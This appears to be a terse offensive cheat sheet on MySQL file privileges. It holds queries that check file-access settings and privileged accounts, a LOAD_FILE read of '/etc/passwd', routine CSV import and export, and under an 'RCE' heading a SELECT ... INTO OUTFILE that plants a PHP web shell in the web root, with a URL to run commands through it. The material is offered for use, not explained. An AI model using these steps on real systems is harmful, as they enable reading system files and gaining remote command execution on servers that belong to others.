Check
SHOW VARIABLES LIKE 'secure_file_priv';
SHOW VARIABLES LIKE 'local_infile';
SELECT User,Host,File_priv,Super_priv FROM mysql.user WHERE File_priv='Y' OR Super_priv='Y';
SELECT LOAD_FILE('/etc/passwd');
FROM_BASE64("base64_data")
Import data into DB
LOAD DATA INFILE '/var/lib/mysql-files/data.csv' INTO TABLE my_table FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n' IGNORE 1 ROWS;
Export data to file
SELECT id,name,email
INTO OUTFILE '/var/lib/mysql-files/users_export.csv'
FIELDS TERMINATED BY ','
LINES TERMINATED BY '\n'
FROM users;
RCE
SELECT "<?php system($_GET['cmd']); ?>"
INTO OUTFILE '/var/www/html/shell.php';
Then hit: http://target/shell.php?cmd=whoami